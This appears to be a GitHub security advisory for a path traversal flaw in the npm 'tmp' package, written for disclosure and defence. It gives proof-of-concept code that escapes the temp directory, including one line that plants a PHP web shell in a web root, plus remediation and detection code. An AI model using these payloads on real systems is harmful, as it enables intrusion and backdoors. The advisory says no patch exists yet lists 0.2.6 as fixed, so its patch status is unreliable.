GHSA-PH9P-34F9-6G65
Vulnerability from github – Published: 2026-05-27 00:34 – Updated: 2026-05-27 00:34
VLAI
Summary
tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape
Details
Summary
The tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the prefix, postfix, or dir options. By embedding traversal sequences (e.g., ../) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp's file/directory creation functions without proper input sanitization.
Details
Root Cause: The vulnerability exists in tmp's path construction logic where user-supplied options are directly concatenated into file paths without sanitization or validation.
Technical Flow:
1. Filename Construction: tmp builds filenames as <prefix>-<pid>-<random>-<postfix>
2. Path Composition: Final path computed as path.join(tmpDir, opts.dir, name)
3. Path Normalization: Node.js path.join() normalizes traversal sequences, allowing escape
4. File Creation: File created at the resulting (potentially escaped) path
Vulnerable Pattern:
// In tmp package internals
const name = `${opts.prefix || ''}-${process.pid}-${randomString}-${opts.postfix || ''}`;
const finalPath = path.join(tmpDir, opts.dir || '', name);
// No validation that finalPath remains within tmpDir
Path Traversal Mechanics:
- prefix/postfix traversal: ../../../evil in prefix escapes directory structure
- Absolute path bypass: If opts.dir is absolute, path.join() ignores tmpDir completely
- Normalization exploitation: path.join() resolves ../ sequences regardless of surrounding text
- Cross-platform impact: Works on Windows (..\\), Unix (../), and mixed path systems
Key Vulnerability Points:
- No input validation on prefix, postfix, or dir parameters
- Direct use of user input in path construction
- Reliance on path.join() normalization without containment checks
- Missing post-construction validation that final path remains within intended directory
PoC
Basic Path Traversal via prefix:
const tmp = require('tmp');
const path = require('path');
const fs = require('fs');
// Create a controlled base directory
const baseDir = fs.mkdtempSync('/tmp/safe-base-');
console.log('Base directory:', baseDir);
// Escape via prefix
tmp.file({
tmpdir: baseDir,
prefix: '../escaped'
}, (err, filepath, fd, cleanup) => {
if (err) throw err;
console.log('Created file:', filepath);
console.log('Relative to base:', path.relative(baseDir, filepath));
// Output shows: ../escaped-<pid>-<random>
cleanup();
});
Directory Escape via postfix:
tmp.file({
tmpdir: baseDir,
postfix: '/../../pwned.txt'
}, (err, filepath, fd, cleanup) => {
if (err) throw err;
console.log('Escaped file:', filepath);
console.log('Escaped outside base:', !filepath.startsWith(baseDir));
cleanup();
});
Absolute Path Bypass via dir:
tmp.file({
tmpdir: '/safe/tmp/dir',
dir: '/tmp/evil-location',
prefix: 'bypassed'
}, (err, filepath, fd, cleanup) => {
if (err) throw err;
console.log('Bypassed to:', filepath);
// File created in /tmp/evil-location instead of /safe/tmp/dir
cleanup();
});
Advanced Multi-Vector Attack:
const maliciousOpts = {
tmpdir: '/app/safe-tmp',
dir: '../../../tmp', // Escape base
prefix: '../sensitive-area/', // Further traversal
postfix: 'malicious.config' // Controlled filename
};
tmp.file(maliciousOpts, (err, filepath, fd, cleanup) => {
// Results in file creation at: /tmp/sensitive-area/malicious.config
console.log('Final malicious path:', filepath);
cleanup();
});
Real-World Attack Simulation:
// Simulate web API that accepts user file prefix
function createUserTempFile(userPrefix, content) {
return new Promise((resolve, reject) => {
tmp.file({ prefix: userPrefix }, (err, path, fd, cleanup) => {
if (err) return reject(err);
fs.writeSync(fd, content);
console.log('User file created at:', path);
resolve({ path, cleanup });
});
});
}
// Attacker input
const attackerPrefix = '../../../var/www/html/backdoor';
createUserTempFile(attackerPrefix, '<?php system($_GET["cmd"]); ?>');
// Creates PHP backdoor in web root instead of temp directory
Impact
Arbitrary File Creation: - Files created outside intended temporary directories - Attacker control over file placement location - Potential to overwrite existing files (depending on creation flags) - Cross-platform exploitation capability
Attack Scenarios:
1. Web Application Configuration Poisoning: - User uploads file with malicious prefix/postfix - tmp creates "temporary" file in application configuration directory - Malicious configuration loaded on next application restart
2. Cache Poisoning: - Application caches user content using tmp - Attacker escapes to cache directory of different user/tenant - Poisoned cache serves malicious content to other users
3. Build Pipeline Compromise: - CI/CD system processes user PRs with tmp usage - Malicious prefix escapes to build output directories - Compromised build artifacts deployed to production
4. Container Escape Attempt: - Containerized application uses tmp with user input - Attacker attempts to escape container temp restrictions - Files created in host-mapped volumes or sensitive container areas
5. Multi-Tenant Service Bypass: - SaaS platform isolates tenants using separate tmp directories - Tenant A escapes their tmp space to tenant B's area - Cross-tenant data access and potential privilege escalation
Business Impact:
- Data Integrity: Unauthorized file placement can corrupt application state
- Service Disruption: Files in wrong locations may break application functionality
- Security Bypass: Escape temporary isolation boundaries
- Compliance Violations: Files containing sensitive data placed in uncontrolled locations
Affected Products
- Ecosystem: npm
- Package name: tmp
- Repository: github.com/raszi/node-tmp
- Affected versions: All versions with vulnerable path construction logic
- Patched versions: None currently available
Component Impact:
- tmp.file() function - vulnerable to prefix/postfix/dir traversal
- tmp.dir() function - vulnerable to same parameter manipulation
- tmp.tmpName() function - if using affected path construction
Severity: High
CVSS v3.1: 8.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)
CWE Classification: - CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)
Remediation
Input Validation and Sanitization:
- Sanitize prefix/postfix:
function sanitizePrefix(prefix) {
if (!prefix) return '';
// Remove path separators and traversal sequences
return path.basename(String(prefix)).replace(/[\.\/\\]/g, '-');
}
function sanitizePostfix(postfix) {
if (!postfix) return '';
// Allow only safe characters
return String(postfix).replace(/[^A-Za-z0-9._-]/g, '');
}
- Validate dir parameter:
function validateDir(dir, baseDir) {
if (!dir) return '';
// Reject absolute paths
if (path.isAbsolute(dir)) {
throw new Error('Absolute paths not allowed for dir option');
}
// Resolve and check containment
const resolved = path.resolve(baseDir, dir);
const relative = path.relative(baseDir, resolved);
if (relative.startsWith('..') || path.isAbsolute(relative)) {
throw new Error('Dir option escapes base directory');
}
return dir;
}
- Post-construction path validation:
function validateFinalPath(finalPath, baseDir) {
const resolved = path.resolve(finalPath);
const relative = path.relative(path.resolve(baseDir), resolved);
if (relative.startsWith('..') || path.isAbsolute(relative)) {
throw new Error('Generated path escapes temporary directory');
}
return resolved;
}
Secure Implementation Pattern:
function createTempFile(options) {
const opts = { ...options };
// Sanitize inputs
opts.prefix = sanitizePrefix(opts.prefix);
opts.postfix = sanitizePostfix(opts.postfix);
opts.dir = validateDir(opts.dir, opts.tmpdir);
// Create with sanitized options
return tmp.file(opts, (err, path, fd, cleanup) => {
if (err) return callback(err);
// Validate final path
try {
validateFinalPath(path, opts.tmpdir);
} catch (validationErr) {
cleanup();
return callback(validationErr);
}
callback(null, path, fd, cleanup);
});
}
Workarounds
For Application Developers:
- Input Sanitization:
// Sanitize before passing to tmp
function safeTmpFile(userOptions) {
const safeOpts = {
...userOptions,
prefix: userOptions.prefix ? path.basename(userOptions.prefix) : undefined,
postfix: userOptions.postfix ? userOptions.postfix.replace(/[^A-Za-z0-9._-]/g, '') : undefined,
dir: undefined // Don't allow user-controlled dir
};
return tmp.file(safeOpts);
}
- Path Validation:
function validateTmpPath(tmpPath, expectedBase) {
const relativePath = path.relative(expectedBase, tmpPath);
if (relativePath.startsWith('..') || path.isAbsolute(relativePath)) {
throw new Error('Temporary file path escaped base directory');
}
return tmpPath;
}
- Restricted Usage:
// Only use tmp with known-safe, literal values
tmp.file({ prefix: 'app-temp-', postfix: '.tmp' }, callback);
// Never: tmp.file({ prefix: userInput }, callback);
For Security Teams:
- Code Review Patterns:
# Search for dangerous tmp usage
grep -r "tmp\.file.*prefix.*req\|tmp\.file.*postfix.*req" .
grep -r "tmp\.dir.*opts\|tmp\.file.*opts" .
- Runtime Monitoring:
// Monitor for files created outside expected temp areas
const originalFile = tmp.file;
tmp.file = function(options, callback) {
return originalFile(options, (err, path, fd, cleanup) => {
if (!err && options.tmpdir) {
const relative = require('path').relative(options.tmpdir, path);
if (relative.startsWith('..')) {
console.warn('Path traversal detected:', path);
}
}
return callback(err, path, fd, cleanup);
});
};
Detection and Monitoring
Static Analysis: - Scan for tmp usage with user-controlled input - Identify unsanitized parameter passing to tmp functions - Review file creation patterns in temporary directories
Runtime Detection:
// Log suspicious tmp operations
function monitorTmpUsage() {
const originalTmpFile = require('tmp').file;
require('tmp').file = function(options = {}, callback) {
// Check for suspicious patterns
const suspicious = [
options.prefix && options.prefix.includes('..'),
options.postfix && options.postfix.includes('..'),
options.dir && path.isAbsolute(options.dir)
].some(Boolean);
if (suspicious) {
console.warn('Suspicious tmp usage detected:', options);
}
return originalTmpFile.call(this, options, callback);
};
}
File System Monitoring:
# Monitor file creation outside expected temp directories
inotifywait -m -r --format '%w%f %e' /tmp /var/tmp | while read file event; do
if [[ "$event" == *"CREATE"* && "$file" != /tmp/tmp-* ]]; then
echo "Unexpected file creation: $file"
fi
done
Acknowledgements
Reported by: Mapta / BugBunny_ai
Severity
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "tmp"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.2.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44705"
],
"database_specific": {
"cwe_ids": [
"CWE-22"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-27T00:34:06Z",
"nvd_published_at": null,
"severity": "HIGH"
},
"details": "### Summary\n\nThe tmp npm package contains a path traversal vulnerability that allows escaping the intended temporary directory when untrusted data flows into the `prefix`, `postfix`, or `dir` options. By embedding traversal sequences (e.g., `../`) or path separators in these parameters, attackers can cause files to be created outside the configured temporary base directory at attacker-controlled locations with the privileges of the running process. This vulnerability affects applications that pass user-controlled data to tmp\u0027s file/directory creation functions without proper input sanitization.\n\n### Details\n\n**Root Cause:**\nThe vulnerability exists in tmp\u0027s path construction logic where user-supplied options are directly concatenated into file paths without sanitization or validation.\n\n**Technical Flow:**\n1. **Filename Construction:** tmp builds filenames as `\u003cprefix\u003e-\u003cpid\u003e-\u003crandom\u003e-\u003cpostfix\u003e`\n2. **Path Composition:** Final path computed as `path.join(tmpDir, opts.dir, name)`\n3. **Path Normalization:** Node.js `path.join()` normalizes traversal sequences, allowing escape\n4. **File Creation:** File created at the resulting (potentially escaped) path\n\n**Vulnerable Pattern:**\n```javascript\n// In tmp package internals\nconst name = `${opts.prefix || \u0027\u0027}-${process.pid}-${randomString}-${opts.postfix || \u0027\u0027}`;\nconst finalPath = path.join(tmpDir, opts.dir || \u0027\u0027, name);\n// No validation that finalPath remains within tmpDir\n```\n\n**Path Traversal Mechanics:**\n- **prefix/postfix traversal:** `../../../evil` in prefix escapes directory structure\n- **Absolute path bypass:** If `opts.dir` is absolute, `path.join()` ignores `tmpDir` completely\n- **Normalization exploitation:** `path.join()` resolves `../` sequences regardless of surrounding text\n- **Cross-platform impact:** Works on Windows (`..\\\\`), Unix (`../`), and mixed path systems\n\n**Key Vulnerability Points:**\n- No input validation on `prefix`, `postfix`, or `dir` parameters\n- Direct use of user input in path construction\n- Reliance on `path.join()` normalization without containment checks\n- Missing post-construction validation that final path remains within intended directory\n\n### PoC\n\n**Basic Path Traversal via prefix:**\n```javascript\nconst tmp = require(\u0027tmp\u0027);\nconst path = require(\u0027path\u0027);\nconst fs = require(\u0027fs\u0027);\n\n// Create a controlled base directory\nconst baseDir = fs.mkdtempSync(\u0027/tmp/safe-base-\u0027);\nconsole.log(\u0027Base directory:\u0027, baseDir);\n\n// Escape via prefix\ntmp.file({ \n tmpdir: baseDir, \n prefix: \u0027../escaped\u0027 \n}, (err, filepath, fd, cleanup) =\u003e {\n if (err) throw err;\n \n console.log(\u0027Created file:\u0027, filepath);\n console.log(\u0027Relative to base:\u0027, path.relative(baseDir, filepath));\n // Output shows: ../escaped-\u003cpid\u003e-\u003crandom\u003e\n \n cleanup();\n});\n```\n\n**Directory Escape via postfix:**\n```javascript\ntmp.file({ \n tmpdir: baseDir, \n postfix: \u0027/../../pwned.txt\u0027 \n}, (err, filepath, fd, cleanup) =\u003e {\n if (err) throw err;\n \n console.log(\u0027Escaped file:\u0027, filepath);\n console.log(\u0027Escaped outside base:\u0027, !filepath.startsWith(baseDir));\n \n cleanup();\n});\n```\n\n**Absolute Path Bypass via dir:**\n```javascript\ntmp.file({ \n tmpdir: \u0027/safe/tmp/dir\u0027, \n dir: \u0027/tmp/evil-location\u0027,\n prefix: \u0027bypassed\u0027\n}, (err, filepath, fd, cleanup) =\u003e {\n if (err) throw err;\n \n console.log(\u0027Bypassed to:\u0027, filepath);\n // File created in /tmp/evil-location instead of /safe/tmp/dir\n \n cleanup();\n});\n```\n\n**Advanced Multi-Vector Attack:**\n```javascript\nconst maliciousOpts = {\n tmpdir: \u0027/app/safe-tmp\u0027,\n dir: \u0027../../../tmp\u0027, // Escape base\n prefix: \u0027../sensitive-area/\u0027, // Further traversal\n postfix: \u0027malicious.config\u0027 // Controlled filename\n};\n\ntmp.file(maliciousOpts, (err, filepath, fd, cleanup) =\u003e {\n // Results in file creation at: /tmp/sensitive-area/malicious.config\n console.log(\u0027Final malicious path:\u0027, filepath);\n cleanup();\n});\n```\n\n**Real-World Attack Simulation:**\n```javascript\n// Simulate web API that accepts user file prefix\nfunction createUserTempFile(userPrefix, content) {\n return new Promise((resolve, reject) =\u003e {\n tmp.file({ prefix: userPrefix }, (err, path, fd, cleanup) =\u003e {\n if (err) return reject(err);\n \n fs.writeSync(fd, content);\n console.log(\u0027User file created at:\u0027, path);\n resolve({ path, cleanup });\n });\n });\n}\n\n// Attacker input\nconst attackerPrefix = \u0027../../../var/www/html/backdoor\u0027;\ncreateUserTempFile(attackerPrefix, \u0027\u003c?php system($_GET[\"cmd\"]); ?\u003e\u0027);\n// Creates PHP backdoor in web root instead of temp directory\n```\n\n### Impact\n\n**Arbitrary File Creation:**\n- Files created outside intended temporary directories\n- Attacker control over file placement location\n- Potential to overwrite existing files (depending on creation flags)\n- Cross-platform exploitation capability\n\n**Attack Scenarios:**\n\n**1. Web Application Configuration Poisoning:**\n- User uploads file with malicious prefix/postfix\n- tmp creates \"temporary\" file in application configuration directory\n- Malicious configuration loaded on next application restart\n\n**2. Cache Poisoning:**\n- Application caches user content using tmp\n- Attacker escapes to cache directory of different user/tenant\n- Poisoned cache serves malicious content to other users\n\n**3. Build Pipeline Compromise:**\n- CI/CD system processes user PRs with tmp usage\n- Malicious prefix escapes to build output directories\n- Compromised build artifacts deployed to production\n\n**4. Container Escape Attempt:**\n- Containerized application uses tmp with user input\n- Attacker attempts to escape container temp restrictions\n- Files created in host-mapped volumes or sensitive container areas\n\n**5. Multi-Tenant Service Bypass:**\n- SaaS platform isolates tenants using separate tmp directories\n- Tenant A escapes their tmp space to tenant B\u0027s area\n- Cross-tenant data access and potential privilege escalation\n\n**Business Impact:**\n- **Data Integrity:** Unauthorized file placement can corrupt application state\n- **Service Disruption:** Files in wrong locations may break application functionality \n- **Security Bypass:** Escape temporary isolation boundaries\n- **Compliance Violations:** Files containing sensitive data placed in uncontrolled locations\n\n### Affected Products\n\n- **Ecosystem:** npm\n- **Package name:** tmp\n- **Repository:** github.com/raszi/node-tmp\n- **Affected versions:** All versions with vulnerable path construction logic\n- **Patched versions:** None currently available\n\n**Component Impact:**\n- `tmp.file()` function - vulnerable to prefix/postfix/dir traversal\n- `tmp.dir()` function - vulnerable to same parameter manipulation \n- `tmp.tmpName()` function - if using affected path construction\n\n**Severity:** High \n**CVSS v3.1:** 8.1 (AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:L)\n\n**CWE Classification:**\n- CWE-22: Improper Limitation of a Pathname to a Restricted Directory (Path Traversal)\n\n### Remediation\n\n**Input Validation and Sanitization:**\n\n1. **Sanitize prefix/postfix:**\n```javascript\nfunction sanitizePrefix(prefix) {\n if (!prefix) return \u0027\u0027;\n // Remove path separators and traversal sequences\n return path.basename(String(prefix)).replace(/[\\.\\/\\\\]/g, \u0027-\u0027);\n}\n\nfunction sanitizePostfix(postfix) {\n if (!postfix) return \u0027\u0027;\n // Allow only safe characters\n return String(postfix).replace(/[^A-Za-z0-9._-]/g, \u0027\u0027);\n}\n```\n\n2. **Validate dir parameter:**\n```javascript\nfunction validateDir(dir, baseDir) {\n if (!dir) return \u0027\u0027;\n \n // Reject absolute paths\n if (path.isAbsolute(dir)) {\n throw new Error(\u0027Absolute paths not allowed for dir option\u0027);\n }\n \n // Resolve and check containment\n const resolved = path.resolve(baseDir, dir);\n const relative = path.relative(baseDir, resolved);\n \n if (relative.startsWith(\u0027..\u0027) || path.isAbsolute(relative)) {\n throw new Error(\u0027Dir option escapes base directory\u0027);\n }\n \n return dir;\n}\n```\n\n3. **Post-construction path validation:**\n```javascript\nfunction validateFinalPath(finalPath, baseDir) {\n const resolved = path.resolve(finalPath);\n const relative = path.relative(path.resolve(baseDir), resolved);\n \n if (relative.startsWith(\u0027..\u0027) || path.isAbsolute(relative)) {\n throw new Error(\u0027Generated path escapes temporary directory\u0027);\n }\n \n return resolved;\n}\n```\n\n**Secure Implementation Pattern:**\n```javascript\nfunction createTempFile(options) {\n const opts = { ...options };\n \n // Sanitize inputs\n opts.prefix = sanitizePrefix(opts.prefix);\n opts.postfix = sanitizePostfix(opts.postfix);\n opts.dir = validateDir(opts.dir, opts.tmpdir);\n \n // Create with sanitized options\n return tmp.file(opts, (err, path, fd, cleanup) =\u003e {\n if (err) return callback(err);\n \n // Validate final path\n try {\n validateFinalPath(path, opts.tmpdir);\n } catch (validationErr) {\n cleanup();\n return callback(validationErr);\n }\n \n callback(null, path, fd, cleanup);\n });\n}\n```\n\n### Workarounds\n\n**For Application Developers:**\n\n1. **Input Sanitization:**\n```javascript\n// Sanitize before passing to tmp\nfunction safeTmpFile(userOptions) {\n const safeOpts = {\n ...userOptions,\n prefix: userOptions.prefix ? path.basename(userOptions.prefix) : undefined,\n postfix: userOptions.postfix ? userOptions.postfix.replace(/[^A-Za-z0-9._-]/g, \u0027\u0027) : undefined,\n dir: undefined // Don\u0027t allow user-controlled dir\n };\n \n return tmp.file(safeOpts);\n}\n```\n\n2. **Path Validation:**\n```javascript\nfunction validateTmpPath(tmpPath, expectedBase) {\n const relativePath = path.relative(expectedBase, tmpPath);\n if (relativePath.startsWith(\u0027..\u0027) || path.isAbsolute(relativePath)) {\n throw new Error(\u0027Temporary file path escaped base directory\u0027);\n }\n return tmpPath;\n}\n```\n\n3. **Restricted Usage:**\n```javascript\n// Only use tmp with known-safe, literal values\ntmp.file({ prefix: \u0027app-temp-\u0027, postfix: \u0027.tmp\u0027 }, callback);\n// Never: tmp.file({ prefix: userInput }, callback);\n```\n\n**For Security Teams:**\n\n1. **Code Review Patterns:**\n```bash\n# Search for dangerous tmp usage\ngrep -r \"tmp\\.file.*prefix.*req\\|tmp\\.file.*postfix.*req\" .\ngrep -r \"tmp\\.dir.*opts\\|tmp\\.file.*opts\" .\n```\n\n2. **Runtime Monitoring:**\n```javascript\n// Monitor for files created outside expected temp areas\nconst originalFile = tmp.file;\ntmp.file = function(options, callback) {\n return originalFile(options, (err, path, fd, cleanup) =\u003e {\n if (!err \u0026\u0026 options.tmpdir) {\n const relative = require(\u0027path\u0027).relative(options.tmpdir, path);\n if (relative.startsWith(\u0027..\u0027)) {\n console.warn(\u0027Path traversal detected:\u0027, path);\n }\n }\n return callback(err, path, fd, cleanup);\n });\n};\n```\n\n### Detection and Monitoring\n\n**Static Analysis:**\n- Scan for tmp usage with user-controlled input\n- Identify unsanitized parameter passing to tmp functions\n- Review file creation patterns in temporary directories\n\n**Runtime Detection:**\n```javascript\n// Log suspicious tmp operations\nfunction monitorTmpUsage() {\n const originalTmpFile = require(\u0027tmp\u0027).file;\n \n require(\u0027tmp\u0027).file = function(options = {}, callback) {\n // Check for suspicious patterns\n const suspicious = [\n options.prefix \u0026\u0026 options.prefix.includes(\u0027..\u0027),\n options.postfix \u0026\u0026 options.postfix.includes(\u0027..\u0027), \n options.dir \u0026\u0026 path.isAbsolute(options.dir)\n ].some(Boolean);\n \n if (suspicious) {\n console.warn(\u0027Suspicious tmp usage detected:\u0027, options);\n }\n \n return originalTmpFile.call(this, options, callback);\n };\n}\n```\n\n**File System Monitoring:**\n```bash\n# Monitor file creation outside expected temp directories\ninotifywait -m -r --format \u0027%w%f %e\u0027 /tmp /var/tmp | while read file event; do\n if [[ \"$event\" == *\"CREATE\"* \u0026\u0026 \"$file\" != /tmp/tmp-* ]]; then\n echo \"Unexpected file creation: $file\"\n fi\ndone\n```\n### Acknowledgements\n\n**Reported by**: Mapta / BugBunny_ai",
"id": "GHSA-ph9p-34f9-6g65",
"modified": "2026-05-27T00:34:06Z",
"published": "2026-05-27T00:34:06Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/security/advisories/GHSA-ph9p-34f9-6g65"
},
{
"type": "WEB",
"url": "https://github.com/raszi/node-tmp/commit/efa4a06f24374797ae32ab2b6ae39b7a611ae429"
},
{
"type": "PACKAGE",
"url": "https://github.com/raszi/node-tmp"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P",
"type": "CVSS_V4"
}
],
"summary": "tmp has Path Traversal via unsanitized prefix/postfix that enables directory escape"
}
Loading…
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
Forecast uses a logistic model when the trend is rising, or an exponential decay model when the trend is falling. Fitted via linearized least squares.
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.
Loading…
Loading…